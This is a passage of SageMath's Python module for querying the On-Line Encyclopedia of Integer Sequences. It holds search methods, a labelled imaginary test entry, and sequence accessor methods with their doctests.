if fetch:
sequence.online_update()
return sequence
def find_by_entry(self, entry):
r"""
INPUT:
- ``entry`` -- a string corresponding to an entry in the internal format
of the OEIS.
OUTPUT:
- The corresponding OEIS sequence.
EXAMPLES::
sage: entry = '%I A262002\n%N A262002 L.g.f.: log( Sum_{n>=0} x^n/n! * Product_{k=1..n} (k^2 + 1) ).\n%K A262002 nonn'
sage: s = oeis.find_by_entry(entry)
sage: s
A262002: L.g.f.: log( Sum_{n>=0} x^n/n! * Product_{k=1..n} (k^2 + 1) ).
"""
ident = entry[3:10]
sequence = OEISSequence(ident=ident)
sequence._raw = entry
return sequence
def find_by_description(self, description, max_results=3, first_result=0):
r"""
Search for OEIS sequences corresponding to the description.
INPUT:
- ``description`` -- (string) the description the searched sequences.
- ``max_results`` -- (integer, default: 3) the maximum number of results
we want. In any case, the on-line encyclopedia will not return more
than 100 results.
- ``first_result`` -- (integer, default: 0) allow to skip the
``first_result`` first results in the search, to go further.
This is useful if you are looking for a sequence that may appear
after the 100 first found sequences.
OUTPUT:
- a tuple (with fancy formatting) of at most ``max_results`` OEIS
sequences. Those sequences can be used without the need to fetch the
database again.
EXAMPLES::
sage: oeis.find_by_description('prime gap factorization') # optional -- internet
0: A...: ...
1: A...: ...
2: A...: ...
sage: prime_gaps = _[2] ; prime_gaps # optional -- internet
A073490: Number of prime gaps in factorization of n.
sage: oeis('beaver') # optional -- internet
0: A...: ...eaver...
1: A...: ...eaver...
2: A...: ...eaver...
sage: oeis('beaver', max_results=4, first_result=2) # optional -- internet
0: A...: ...eaver...
1: A...: ...eaver...
2: A...: ...eaver...
3: A...: ...eaver...
"""
options = {'q': description,
'n': str(max_results),
'fmt': 'text',
'start': str(first_result)}
url = oeis_url + "search?" + urlencode(options)
sequence_list = _fetch(url).split('\n\n')[2:-1]
return FancyTuple([self.find_by_entry(entry=_) for _ in sequence_list])
def find_by_subsequence(self, subsequence, max_results=3, first_result=0):
r"""
Search for OEIS sequences containing the given subsequence.
INPUT:
- ``subsequence`` -- a list of integers.
- ``max_results`` -- (integer, default: 3), the maximum of results requested.
- ``first_result`` -- (integer, default: 0) allow to skip the
``first_result`` first results in the search, to go further.
This is useful if you are looking for a sequence that may appear
after the 100 first found sequences.
OUTPUT:
- a tuple (with fancy formatting) of at most ``max_results`` OEIS
sequences. Those sequences can be used without the need to fetch the
database again.
EXAMPLES::
sage: oeis.find_by_subsequence([2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377]) # optional -- internet
0: A000045: Fibonacci numbers: F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.
1: A212804: Expansion of (1-x)/(1-x-x^2).
2: A177194: Fibonacci numbers whose decimal expansion does not contain any digit 0.
sage: fibo = _[0] ; fibo # optional -- internet
A000045: Fibonacci numbers: F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.
"""
subsequence = str(subsequence)[1:-1]
return self.find_by_description(subsequence, max_results, first_result)
def browse(self):
r"""
Open the OEIS web page in a browser.
EXAMPLES::
sage: oeis.browse() # optional -- webbrowser
"""
import webbrowser
webbrowser.open(oeis_url)
def _imaginary_entry(self, ident='A999999', keywords=''):
r"""
This is an imaginary entry of an OEIS sequence for offline tests.
INPUT:
- ``ident`` -- a string representing the A-number of the sequence.
- ``keywords`` -- a string corresponding to the keyword field of the
sequence.
OUTPUT:
- a string representing the entry of the sequence.
TESTS::
sage: oeis._imaginary_entry().split('\n')[0]
'%I A999999 M9999 N9999'
sage: keywords = 'simon,cussonet'
sage: s = oeis.find_by_entry(entry=oeis._imaginary_entry(ident='A999998', keywords=keywords))
sage: ','.join(s.keywords()) == keywords
True
"""
return ('%I ' + ident + ' M9999 N9999\n'
'%S ' + ident + ' 1,1,1,1,2,1,1,1,\n'
'%T ' + ident + ' 1,1,1,1,1,1,1,1,1,\n'
'%U ' + ident + ' 1,1,1,1,1,1,1,1,1\n'
'%N ' + ident + ' The characteristic sequence of 42 plus one, starting from 38.\n'
'%D ' + ident + ' Lewis Carroll, Alice\'s Adventures in Wonderland.\n'
'%D ' + ident + ' Lewis Carroll, The Hunting of the Snark.\n'
'%D ' + ident + ' Deep Thought, The Answer to the Ultimate Question of Life, The Universe, and Everything.\n'
'%H ' + ident + ' Wikipedia, <a href="https://en.wikipedia.org/wiki/42_(number)">42 (number)</a>\n'
'%H ' + ident + ' See. also <a href="https://trac.sagemath.org/sage_trac/ticket/42">trac ticket #42</a>\n'
'%H ' + ident + ' Do not confuse with the sequence <a href="/A000042">A000042</a> or the sequence <a href="/A000024">A000024</a>\n'
'%H ' + ident + ' The string http://42.com is not a link.\n'
'%F ' + ident + ' For n big enough, s(n+1) - s(n) = 0.\n'
'%Y ' + ident + ' Related sequences are A000042 and its friend A000024.\n'
'%A ' + ident + ' Anonymous.\n'
'%O ' + ident + ' 38,4\n'
'%E ' + ident + ' This sequence does not contain errors.\n'
'%e ' + ident + ' s(42) + s(43) = 0.\n'
'%p ' + ident + ' Do not even try, Maple is not able to produce such a sequence.\n'
'%t ' + ident + ' Mathematica neither.\n'
'%o ' + ident + ' (Python)\n'
'%o ' + ident + ' def ' + ident + '(n):\n'
'%o ' + ident + ' assert(isinstance(n, (int, Integer))), "n must be an integer."\n'
'%o ' + ident + ' if n < 38:\n'
'%o ' + ident + ' raise ValueError("The value %s is not accepted." %str(n))\n'
'%o ' + ident + ' elif n == 42:\n'
'%o ' + ident + ' return 2\n'
'%o ' + ident + ' else:\n'
'%o ' + ident + ' return 1\n'
'%K ' + ident + ' ' + keywords + '\n'
'%C ' + ident + ' 42 is the product of the first 4 prime numbers, except 5 and perhaps 1.\n'
'%C ' + ident + ' Apart from that, i have no comment.')
def _imaginary_sequence(self, ident='A999999', keywords='sign,easy'):
r"""
This is the OEIS sequence corresponding to the imaginary entry.
Its main purpose is to allow offline doctesting.
INPUT:
- ``ident`` -- a string representing the A-number of the sequence.
- ``keywords`` -- string (default: 'sign,easy'), a list of words
separated by commas.
OUTPUT:
- OEIS sequence.
TESTS::
sage: s = oeis._imaginary_sequence()
sage: s
A999999: The characteristic sequence of 42 plus one, starting from 38.
sage: s[4]
2
sage: s(42)
2
"""
return self.find_by_entry(entry=self._imaginary_entry(ident=ident, keywords=keywords))
class OEISSequence(SageObject, UniqueRepresentation):
r"""
The class of OEIS sequences.
This class implements OEIS sequences. They are usually produced by calls to
the On-Line Encyclopedia of Integer Sequences, represented by the class
:class:`OEIS`.
.. NOTE::
Since some sequences do not start with index 0, there is a difference
between calling and getting item, see :meth:`__call__` for more details
::
sage: sfibo = oeis('A039834')
sage: sfibo.first_terms()[:10] # optional -- internet
(1, 1, 0, 1, -1, 2, -3, 5, -8, 13)
sage: sfibo(-2) # optional -- internet
1
sage: sfibo(3) # optional -- internet
2
sage: sfibo.offsets() # optional -- internet
(-2, 6)
sage: sfibo[0] # optional -- internet
1
sage: sfibo[6] # optional -- internet
-3
.. automethod:: __call__
"""
@staticmethod
def __classcall__(cls, ident):
r"""
Canonicalize the ID of the sequence into a A-number.
TESTS::
sage: oeis(45) is oeis('A000045')
True
"""
if not isinstance(ident, str):
ident = str(ident)
ident = 'A000000'[:-len(ident)] + ident
return super(OEISSequence, cls).__classcall__(cls, ident)
def __init__(self, ident):
r"""
Initialize an OEIS sequence.
There is no fetching of additional information about the sequence at
this point, only the A-number is required to construct a sequence.
INPUT:
- ``ident`` -- a string representing the A-number of the sequence or an
integer representing its number.
TESTS::
sage: sfibo = oeis('A039834')
sage: s = oeis._imaginary_sequence()
"""
self._id = ident
def online_update(self):
r"""
Fetch the online OEIS to update the informations about this sequence.
TESTS::
sage: s = oeis._imaginary_sequence(ident='A004238')
sage: s
A004238: The characteristic sequence of 42 plus one, starting from 38.
sage: s.online_update() # optional -- internet
sage: s # optional -- internet
A004238: a(n) = 100*log(n) rounded to nearest integer.
"""
options = {'q': self._id, 'n': '1', 'fmt': 'text'}
url = oeis_url + "search?" + urlencode(options)
self._raw = _fetch(url).split('\n\n')[2]
try:
del self._fields
except AttributeError:
pass
def _field(self, key):
r"""
Return the ``key`` field of the entry of ``self``.
This method allows to handle the ``_fields`` dictionary in a lazy way.
TESTS::
sage: s = oeis._imaginary_sequence()
sage: s._field('C')[0]
'42 is the product of the first 4 prime numbers, except 5 and perhaps 1.'
"""
try:
return self._fields[key]
except AttributeError:
fields = defaultdict(list)
for line in self.raw_entry().splitlines():
fields[line[1]].append(line[11:])
self._fields = fields
self.is_dead(warn_only=True)
return self._fields[key]
def id(self, format='A'):
r"""
The ID of the sequence ``self`` is the A-number that identifies
``self``.
INPUT:
- ``format`` -- (string, default: 'A').
OUTPUT:
- if ``format`` is set to 'A', returns a string of the form 'A000123'.
- if ``format`` is set to 'int' returns an integer of the form 123.
EXAMPLES::
sage: f = oeis(45) ; f # optional -- internet
A000045: Fibonacci numbers: F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.
sage: f.id() # optional -- internet
'A000045'
sage: f.id(format='int') # optional -- internet
45
TESTS::
sage: s = oeis._imaginary_sequence()
sage: s.id()
'A999999'
sage: s.id(format='int')
999999
"""
if format == 'A':
return self._id
elif format == 'int':
return int(self._id[1:].lstrip("0"))
def __hash__(self):
r"""
Return the hash of ``self``, which is its numerical OEIS ID.
This method allows unique representation of OEIS sequences.
OUTPUT:
- Python `int`.
EXAMPLES::
sage: s = oeis([1,2,3,5,8,13])[0] # optional -- internet
sage: hash(s) # optional -- internet
45
We have unique representation::
sage: t = oeis(45) # optional -- internet
sage: s is t # optional -- internet
True
sage: s == t # optional -- internet
True
TESTS::
sage: s = oeis._imaginary_sequence()
sage: s is oeis._imaginary_sequence()
True
sage: s == oeis._imaginary_sequence()
True
"""
return self.id(format='int')
def raw_entry(self):
r"""
Return the raw entry of the sequence ``self``, in the OEIS format.
The raw entry is fetched online if needed.
OUTPUT:
- string.
EXAMPLES::
sage: f = oeis(45) ; f # optional -- internet
A000045: Fibonacci numbers: F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.
sage: print(f.raw_entry()) # optional -- internet
%I A000045 M0692 N0256
%S A000045 0,1,1,2,3,5,8,13,21,34,55,89,144,...
%T A000045 10946,17711,28657,46368,...
...
TESTS::
sage: s = oeis._imaginary_sequence()
sage: s.raw_entry() == oeis._imaginary_entry(keywords='sign,easy')
True
"""
try:
return self._raw
except AttributeError:
self.online_update()
return self._raw
def name(self):
r"""
Return the name of the sequence ``self``.
OUTPUT:
- string.
EXAMPLES::
sage: f = oeis(45) ; f # optional -- internet
A000045: Fibonacci numbers: F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.
sage: f.name() # optional -- internet
'Fibonacci numbers: F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.'
TESTS::
sage: s = oeis._imaginary_sequence()
sage: s.name()
'The characteristic sequence of 42 plus one, starting from 38.'
"""
return self._field('N')[0]
def old_IDs(self):
r"""
Return the IDs of the sequence ``self`` corresponding to ancestors of OEIS.
OUTPUT:
- a tuple of at most two strings. When the string starts with `M`, it
corresponds to the ID of "The Encyclopedia of Integer Sequences" of
1995. When the string starts with `N`, it corresponds to the ID of
the "Handbook of Integer Sequences" of 1973.
EXAMPLES::
sage: f = oeis(45) ; f # optional -- internet
A000045: Fibonacci numbers: F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.
sage: f.old_IDs() # optional -- internet
('M0692', 'N0256')
TESTS::
sage: s = oeis._imaginary_sequence()
sage: s.old_IDs()
('M9999', 'N9999')
"""
return tuple(self._field('I')[0].split(' '))
def offsets(self):
r"""
Return the offsets of the sequence ``self``.
The first offset is the subscript of the first term in the sequence
``self``. When, the sequence represents the decimal expansion of a real
number, it corresponds to the number of digits of its integer part.
The second offset is the first term in the sequence ``self`` (starting
from 1) whose absolute value is greater than 1. This is set to 1 if all
the terms are 0 or +-1.
OUTPUT:
- tuple of two elements.
EXAMPLES::
sage: f = oeis(45) ; f # optional -- internet
A000045: Fibonacci numbers: F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.
sage: f.offsets() # optional -- internet
(0, 4)
sage: f.first_terms()[:4] # optional -- internet
(0, 1, 1, 2)
TESTS::
sage: s = oeis._imaginary_sequence()
sage: s.offsets()
(38, 4)
"""
return to_tuple(self._field('O')[0])
def author(self):
r"""
Return the author of the sequence in the encyclopedia.
OUTPUT:
- string.
EXAMPLES::
sage: f = oeis(45) ; f # optional -- internet
A000045: Fibonacci numbers: F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.
sage: f.author() # optional -- internet
'_N. J. A. Sloane_, 1964'
TESTS::
sage: s = oeis._imaginary_sequence()
sage: s.author()
'Anonymous.'
"""
return self._field('A')[0]
def keywords(self):
r"""
Return the keywords associated to the sequence ``self``.
OUTPUT:
- tuple of strings.
EXAMPLES::
sage: f = oeis(53) ; f # optional -- internet
A000053: Local stops on New York City Broadway line (IRT #1) subway.
sage: f.keywords() # optional -- internet
('nonn', 'fini', 'full')
TESTS::
sage: s = oeis._imaginary_sequence()
sage: s.keywords()
('sign', 'easy')
sage: s = oeis._imaginary_sequence(ident='A999997', keywords='nonn,hard')
sage: s.keywords()
('nonn', 'hard')
"""
return tuple(self._field('K')[0].split(','))
def natural_object(self):
r"""
Return the natural object associated to the sequence ``self``.
OUTPUT:
- If the sequence ``self`` corresponds to the digits of a real
number, returns the associated real number (as an element of
RealLazyField()).
- If the sequence ``self`` corresponds to the convergents of a
continued fraction, returns the associated continued fraction.
.. WARNING::
This method forgets the fact that the returned sequence may not be
complete.
.. TODO::
- ask OEIS to add a keyword telling whether the sequence comes from
a power series, e.g. for https://oeis.org/A000182
- discover other possible conversions.
EXAMPLES::
sage: g = oeis("A002852") ; g # optional -- internet
A002852: Continued fraction for Euler's constant (or Euler-Mascheroni constant) gamma.
sage: x = g.natural_object() ; type(x) # optional -- internet
<class 'sage.rings.continued_fraction.ContinuedFraction_periodic'>
sage: RDF(x) == RDF(euler_gamma) # optional -- internet
True
sage: cfg = continued_fraction(euler_gamma)
sage: x[:90] == cfg[:90] # optional -- internet
True
::
sage: ee = oeis('A001113') ; ee # optional -- internet
A001113: Decimal expansion of e.
sage: x = ee.natural_object() ; x # optional -- internet
2.718281828459046?
sage: x.parent() # optional -- internet
Real Lazy Field
sage: x == RR(e) # optional -- internet
True
::
sage: av = oeis('A087778') ; av # optional -- internet
A087778: Decimal expansion ... Avogadro...
sage: av.natural_object() # optional -- internet
6.022141000000000?e23
::
sage: fib = oeis('A000045') ; fib # optional -- internet
A000045: Fibonacci numbers: F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.
sage: x = fib.natural_object() ; x.universe() # optional -- internet
Non negative integer semiring
::
sage: sfib = oeis('A039834') ; sfib # optional -- internet
A039834: a(n+2) = -a(n+1) + a(n) (signed Fibonacci numbers) with a(-2) = a(-1) = 1; or Fibonacci numbers (A000045) extended to negative indices.
sage: x = sfib.natural_object() ; x.universe() # optional -- internet
Integer Ring
TESTS::
sage: s = oeis._imaginary_sequence(ident='A999996', keywords='nonn,cofr')
sage: type(s.natural_object())
<class 'sage.rings.continued_fraction.ContinuedFraction_periodic'>
sage: s = oeis._imaginary_sequence(ident='A999995', keywords='nonn')
sage: s.natural_object().universe()
Non negative integer semiring
sage: s = oeis._imaginary_sequence()
sage: s.natural_object().universe()
Integer Ring
"""
if 'cofr' in self.keywords() and 'frac' not in self.keywords():
from sage.rings.continued_fraction import continued_fraction
return continued_fraction(self.first_terms())
elif 'cons' in self.keywords():
offset = self.offsets()[0]
terms = self.first_terms() + tuple([0] * abs(offset))
from sage.rings.real_lazy import RealLazyField
return RealLazyField()('0' + ''.join(map(str, terms[:offset])) + '.' + ''.join(map(str, terms[offset:])))
elif 'nonn' in self.keywords():
from sage.structure.sequence import Sequence
from sage.rings.semirings.non_negative_integer_semiring import NN
return Sequence(self.first_terms(), NN)
else:
from sage.structure.sequence import Sequence
from sage.rings.integer_ring import ZZ
return Sequence(self.first_terms(), ZZ)
def is_dead(self, warn_only=False):
r"""
Tell whether the sequence is dead (i.e. erroneous).
INPUT:
- warn_only -- (bool, default: ``False``), whether to warn when the
sequence is dead instead of returning a boolean.
EXAMPLES:
A warn_only test is triggered as soon as some information on the
sequence is queried::
sage: s = oeis(17)
sage: s # optional -- internet
doctest:warning
...
RuntimeWarning: This sequence is dead: "A000017: Erroneous version of A032522."
A000017: Erroneous version of A032522.
TESTS::
sage: s.is_dead() # optional -- internet
True
sage: t = oeis._imaginary_sequence()
sage: t.is_dead()
False
sage: u = oeis._imaginary_sequence(ident='A999994', keywords='dead')
sage: u
doctest:warning
...
RuntimeWarning: This sequence is dead: "A999994: The characteristic sequence of 42 plus one, starting from 38."
A999994: The characteristic sequence of 42 plus one, starting from 38.
sage: u.is_dead()
True
"""
if warn_only:
if 'dead' in self.keywords():
from warnings import warn
warn('This sequence is dead: "{}: {}"'.format(self.id(), self.name()), RuntimeWarning)
else:
return 'dead' in self.keywords()
def is_finite(self):
r"""
Tell whether the sequence is finite.
Currently, OEIS only provides a keyword when the sequence is known to
be finite. So, when this keyword is not there, we do not know whether
it is infinite or not.
OUTPUT:
- ``True`` when the sequence is known to be finite.
- ``Unknown`` otherwise.
.. TODO::
Ask OEIS for a keyword ensuring that a sequence is infinite.
EXAMPLES::
sage: s = oeis('A114288') ; s # optional -- internet
A114288: Lexicographically earliest solution of any 9 X 9 sudoku, read by rows.
sage: s.is_finite() # optional -- internet
True
::
sage: f = oeis(45) ; f # optional -- internet
A000045: Fibonacci numbers: F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.
sage: f.is_finite() # optional -- internet
Unknown
TESTS::
sage: s = oeis._imaginary_sequence()
sage: s.is_finite()
Unknown
sage: s = oeis._imaginary_sequence(ident='A999993', keywords='nonn,finit')
sage: s.is_finite()
True
"""
if 'finit' in self.keywords() or 'full' in self.keywords():
return True
else:
return Unknown
def is_full(self):
r"""
Tell whether the sequence ``self`` is full, that is, if all its
elements are listed in ``self.first_terms()``.
Currently, OEIS only provides a keyword when the sequence is known to
be full. So, when this keyword is not there, we do not know whether
some elements are missing or not.
OUTPUT:
- ``True`` when the sequence is known to be full.
- ``Unknown`` otherwise.
EXAMPLES::
sage: s = oeis('A114288') ; s # optional -- internet
A114288: Lexicographically earliest solution of any 9 X 9 sudoku, read by rows.
sage: s.is_full() # optional -- internet
True
::
sage: f = oeis(45) ; f # optional -- internet
A000045: Fibonacci numbers: F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.
sage: f.is_full() # optional -- internet
Unknown
TESTS::
sage: s = oeis._imaginary_sequence()
sage: s.is_full()
Unknown
sage: s = oeis._imaginary_sequence(ident='A999992', keywords='nonn,full,finit')
sage: s.is_full()
True
"""
if 'full' in self.keywords():
return True
else:
return Unknown
@cached_method
def first_terms(self, number=None):
r"""
INPUT:
- ``number`` -- (integer or ``None``, default: ``None``) the number of
terms returned (if less than the number of available terms). When set
to None, returns all the known terms.
OUTPUT:
- tuple of integers.
EXAMPLES::
sage: f = oeis(45) ; f # optional -- internet
A000045: Fibonacci numbers: F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.
sage: f.first_terms()[:10] # optional -- internet
(0, 1, 1, 2, 3, 5, 8, 13, 21, 34)
Handle dead sequences, see :trac:`17330` ::
sage: oeis(5000).first_terms(12) # optional -- internet
doctest:warning
...
RuntimeWarning: This sequence is dead: "A005000: Erroneous version of A006505."
(1, 0, 0, 1, 1, 1, 11, 36, 92, 491, 2537)
TESTS::
sage: s = oeis._imaginary_sequence()
sage: s.first_terms()
(1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1)
sage: s.first_terms(5)
(1, 1, 1, 1, 2)
"""
fields = ['S', 'T', 'U']
return to_tuple(" ".join(flatten([self._field(a) for a in fields])))[:number]
def _repr_(self):
r"""
Print the sequence number and a short summary of this sequence.
OUTPUT:
- string.
EXAMPLES::
sage: f = oeis(45) # optional -- internet
sage: f # optional -- internet
A000045: Fibonacci numbers: F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.
TESTS::
sage: s = oeis._imaginary_sequence()
sage: s
A999999: The characteristic sequence of 42 plus one, starting from 38.
"""
return "%s: %s" % (self.id(), self.name())
def __call__(self, k):
r"""
Return the element of the sequence ``self`` with index ``k``.
INPUT:
- ``k`` -- integer.
OUTPUT:
- integer.
.. NOTE::
The first index of the sequence ``self`` is not necessarily zero,
it depends on the first offset of ``self``. If the sequence
represents the decimal expansion of a real number, the index 0
corresponds to the digit right after the decimal point.
EXAMPLES::
sage: f = oeis(45) # optional -- internet
sage: f.first_terms()[:10] # optional -- internet
(0, 1, 1, 2, 3, 5, 8, 13, 21, 34)
sage: f(4) # optional -- internet
3
::
sage: sfibo = oeis('A039834') # optional -- internet
sage: sfibo.first_terms()[:10] # optional -- internet
(1, 1, 0, 1, -1, 2, -3, 5, -8, 13)
sage: sfibo(-2) # optional -- internet
1
sage: sfibo(4) # optional -- internet
-3
sage: sfibo.offsets() # optional -- internet
(-2, 6)
TESTS::
sage: s = oeis._imaginary_sequence()
sage: s(38)
1
sage: s(42)
2
sage: s(2)
Traceback (most recent call last):
...
ValueError: Sequence A999999 is not defined (or known) for index 2
"""
offset = self.offsets()[0]
if 'cons' in self.keywords():
offset = - offset
n = k - offset
if not 0 <= n < len(self.first_terms()):
raise ValueError("Sequence %s is not defined (or known) for index %s" % (self.id(), k))
return self.first_terms()[n]
def __getitem__(self, i):
r"""
Return the ``i``th element of sequence ``self``, viewed as a tuple.
The first element appearing in the sequence ``self``corresponds to
``self[0]``. Do not confuse with calling ``self(k)``.
INPUT:
- ``i`` -- integer.
OUTPUT:
- integer.
EXAMPLES::
sage: sfibo = oeis('A039834') # optional -- internet
sage: sfibo[8] # optional -- internet
-8
sage: sfibo(8) # optional -- internet
-21
TESTS::
sage: s = oeis._imaginary_sequence()
sage: s[2]
1
sage: s[4]
2
sage: s[38]
Traceback (most recent call last):
...
IndexError: tuple index out of range
"""
return self.first_terms()[i]
def __iter__(self):
r"""
Iterate over the first terms of ``self``, and raise an error if
those first terms are exhausted and the real associated sequence
still have terms to produce.
OUTPUT:
- integer.
EXAMPLES::
sage: p = oeis('A085823') ; p # optional -- internet
A085823: Numbers in which all substrings are primes.
sage: for i in p: # optional -- internet
....: print(i)
2
3
5
7
23
37
53
73
373
::
sage: w = oeis(7540) ; w # optional -- internet
A007540: Wilson primes: primes p such that (p-1)! == -1 (mod p^2).
sage: i = w.__iter__() # optional -- internet
sage: next(i) # optional -- internet
5
sage: next(i) # optional -- internet
13
sage: next(i) # optional -- internet
563
sage: next(i) # optional -- internet
Traceback (most recent call last):
...
LookupError: Future values not provided by OEIS.
::
sage: f = oeis(45) ; f # optional -- internet
A000045: Fibonacci numbers: F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.
sage: for i in f: # optional -- internet
....: print(i)
Traceback (most recent call last):
...
LookupError: Future values not provided by OEIS.
TESTS::
sage: s = oeis._imaginary_sequence()
sage: for i in s:
....: pass
Traceback (most recent call last):
...
LookupError: Future values not provided by OEIS.
sage: for i in s:
....: if i == 2:
....: print(i)
....: break
2
sage: s = oeis._imaginary_sequence(ident='A999991', keywords='sign,full')
sage: for i in s: pass
"""
for x in self.first_terms():
yield x
if not self.is_full() is True:
raise LookupError("Future values not provided by OEIS.")
def references(self):
r"""
Return a tuple of references associated to the sequence ``self``.
OUTPUT:
- tuple of strings (with fancy formatting).
EXAMPLES::
sage: w = oeis(7540) ; w # optional -- internet
A007540: Wilson primes: primes p such that (p-1)! == -1 (mod p^2).
sage: w.references() # optional -- internet
0: A. H. Beiler, Recreations in the Theory of Numbers, Dover, NY, 1964, p. 52.
1: C. Clawson, Mathematical Mysteries, Plenum Press, 1996, p. 180.
2: R. Crandall and C. Pomerance, Prime Numbers: A Computational Perspective, Springer, NY, 2001; see p. 29.
3: G. H. Hardy and E. M. Wright, An Introduction to the Theory of Numbers, 5th ed., Oxford Univ. Press, 1979, th. 80.
...
sage: _[0] # optional -- internet
'A. H. Beiler, Recreations in the Theory of Numbers, Dover, NY, 1964, p. 52.'
TESTS::
sage: s = oeis._imaginary_sequence()
sage: s.references()[1]
'Lewis Carroll, The Hunting of the Snark.'
"""
return FancyTuple(self._field('D'))
def links(self, browse=None, format='guess'):
r"""
Return, display or browse links associated to the sequence ``self``.
INPUT:
- ``browse`` -- an integer, a list of integers, or the word 'all'
(default: ``None``) : which links to open in a web browser.
- ``format`` -- string (default: 'guess') : how to display the links.
OUTPUT:
- tuple of strings (with fancy formatting):
- if ``format`` is ``url``, returns a tuple of absolute links without description.
- if ``format`` is ``html``, returns nothing but prints a tuple of clickable absolute links in their context.
- if ``format`` is ``guess``, adapts the output to the context (command line or notebook).
- if ``format`` is ``raw``, the links as they appear in the database, relative links are not made absolute.
EXAMPLES::
sage: f = oeis(45) ; f # optional -- internet
A000045: Fibonacci numbers: F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.
sage: f.links(format='url') # optional -- internet
0: https://oeis.org/A000045/b000045.txt
1: ...
2: ...
sage: f.links(format='raw') # optional -- internet
0: N. J. A. Sloane, <a href="/A000045/b000045.txt">The first 2000 Fibonacci numbers: Table of n, F(n) for n = 0..2000</a>
1: ...
2: ...
TESTS::
sage: s = oeis._imaginary_sequence()
sage: s.links(format='raw')[2]
'Do not confuse with the sequence <a href="/A000042">A000042</a> or the sequence <a href="/A000024">A000024</a>'
sage: s.links(format='url')[3]
'https://oeis.org/A000024'
sage: HTML = s.links(format="html"); HTML
0: Wikipedia, <a href="https://en.wikipedia.org/wiki/42_(number)">42 (number)</a>
1: See. also <a href="https://trac.sagemath.org/sage_trac/ticket/42">trac ticket #42</a>
...
sage: type(HTML)
<class 'sage.misc.html.HtmlFragment'>
"""
url_absolute = lambda s: re.sub(r'\"\/', '\"' + oeis_url, s)
if browse is None:
if format == 'guess':
if embedded():
return self.links(format='html')
else:
return self.links(format='url')
elif format == 'raw':
return FancyTuple(self._field('H'))
elif format == 'html':
return HtmlFragment(FancyTuple([url_absolute(_) for _ in self._field('H')]))
elif format == 'url':
url_list = flatten([_urls(url_absolute(string)) for string in self._field('H')])
return FancyTuple(url_list)
else:
import webbrowser
url_list = flatten([_urls(url_absolute(string)) for string in self._field('H')])
if isinstance(browse, (int, Integer)):
webbrowser.open(url_list[browse])
elif isinstance(browse, (list, tuple)):
for url_number in browse:
webbrowser.open(url_list[url_number])
elif browse == 'all':
for url in url_list:
webbrowser.open(url)
def formulas(self):
r"""
Return a tuple of formulas associated to the sequence ``self``.
OUTPUT:
- tuple of strings (with fancy formatting).
EXAMPLES::
sage: f = oeis(45) ; f # optional -- internet
A000045: Fibonacci numbers: F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.
sage: f.formulas()[2] # optional -- internet
'F(n) = ((1+sqrt(5))^n - (1-sqrt(5))^n)/(2^n*sqrt(5)).'
TESTS::
sage: s = oeis._imaginary_sequence()
sage: s.formulas()
0: For n big enough, s(n+1) - s(n) = 0.
"""
return FancyTuple(self._field('F'))
def cross_references(self, fetch=False):
r"""
Return a tuple of cross references associated to the sequence
``self``.
INPUT:
- ``fetch`` -- boolean (default: ``False``).
OUTPUT:
- if ``fetch`` is ``False``, return a list of OEIS IDs (strings).
- if ``fetch`` if ``True``, return a tuple of OEIS sequences.
EXAMPLES::
sage: nbalanced = oeis("A005598") ; nbalanced # optional -- internet
A005598: a(n) = 1 + Sum_{i=1..n} (n-i+1)*phi(i).
sage: nbalanced.cross_references() # optional -- internet
('A049703', 'A049695', 'A103116', 'A000010')
sage: nbalanced.cross_references(fetch=True) # optional -- internet
0: A049703: a(0) = 0; for n>0, a(n) = A005598(n)/2.
1: A049695: Array T read by diagonals; ...
2: A103116: a(n) = A005598(n) - 1.
3: A000010: Euler totient function phi(n): count numbers <= n and prime to n.
sage: phi = _[3] # optional -- internet
TESTS::
sage: s = oeis._imaginary_sequence()
sage: s.cross_references()
('A000042', 'A000024')
"""
ref_list = re.findall('A[0-9]{6}', " ".join(self._field('Y')))
if fetch:
return FancyTuple([oeis.find_by_id(_) for _ in ref_list])
else:
return tuple(ref_list)
def extensions_or_errors(self):
r"""
Return a tuple of extensions or errors associated to the
sequence ``self``.
OUTPUT:
- tuple of strings (with fancy formatting).
EXAMPLES::
sage: sfibo = oeis('A039834') ; sfibo # optional -- internet
A039834: a(n+2) = -a(n+1) + a(n) (signed Fibonacci numbers) with a(-2) = a(-1) = 1; or Fibonacci numbers (A000045) extended to negative indices.
sage: sfibo.extensions_or_errors()[0] # optional -- internet
'Signs corrected by _Len Smiley_ and _N. J. A. Sloane_'
TESTS::
sage: s = oeis._imaginary_sequence()
sage: s.extensions_or_errors()
0: This sequence does not contain errors.
"""
return FancyTuple(self._field('E'))
def examples(self):
r"""
Return a tuple of examples associated to the sequence ``self``.
OUTPUT:
- tuple of strings (with fancy formatting).
EXAMPLES::
sage: c = oeis(1203) ; c # optional -- internet
A001203: Simple continued fraction expansion of Pi.
sage: c.examples() # optional -- internet
0: Pi = 3.1415926535897932384...
1: = 3 + 1/(7 + 1/(15 + 1/(1 + 1/(292 + ...))))
2: = [a_0; a_1, a_2, a_3, ...] = [3; 7, 15, 1, 292, ...]
TESTS::
sage: s = oeis._imaginary_sequence()
sage: s.examples()
0: s(42) + s(43) = 0.
"""
return FancyTuple(self._field('e'))
def comments(self):
r"""
Return a tuple of comments associated to the sequence ``self``.
OUTPUT:
- tuple of strings (with fancy formatting).
EXAMPLES::
sage: f = oeis(45) ; f # optional -- internet
